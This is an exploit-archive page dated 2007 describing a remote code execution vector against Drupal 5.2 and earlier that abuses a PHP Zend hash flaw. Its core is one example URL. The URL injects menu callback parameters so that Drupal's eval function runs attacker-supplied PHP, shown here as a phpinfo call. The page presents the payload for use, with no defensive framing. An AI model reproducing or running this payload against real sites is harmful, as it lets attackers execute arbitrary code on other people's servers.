Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector
# Published : 2007-10-10
# Author : ShAnKaR
# Previous Title : TikiWiki 1.9.8 Remote PHP Injection Vulnerability
# Next Title : cpDynaLinks 1.02 category.php Remote SQL Injection Exploit

Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();

# www.Syue.com [2007-10-10]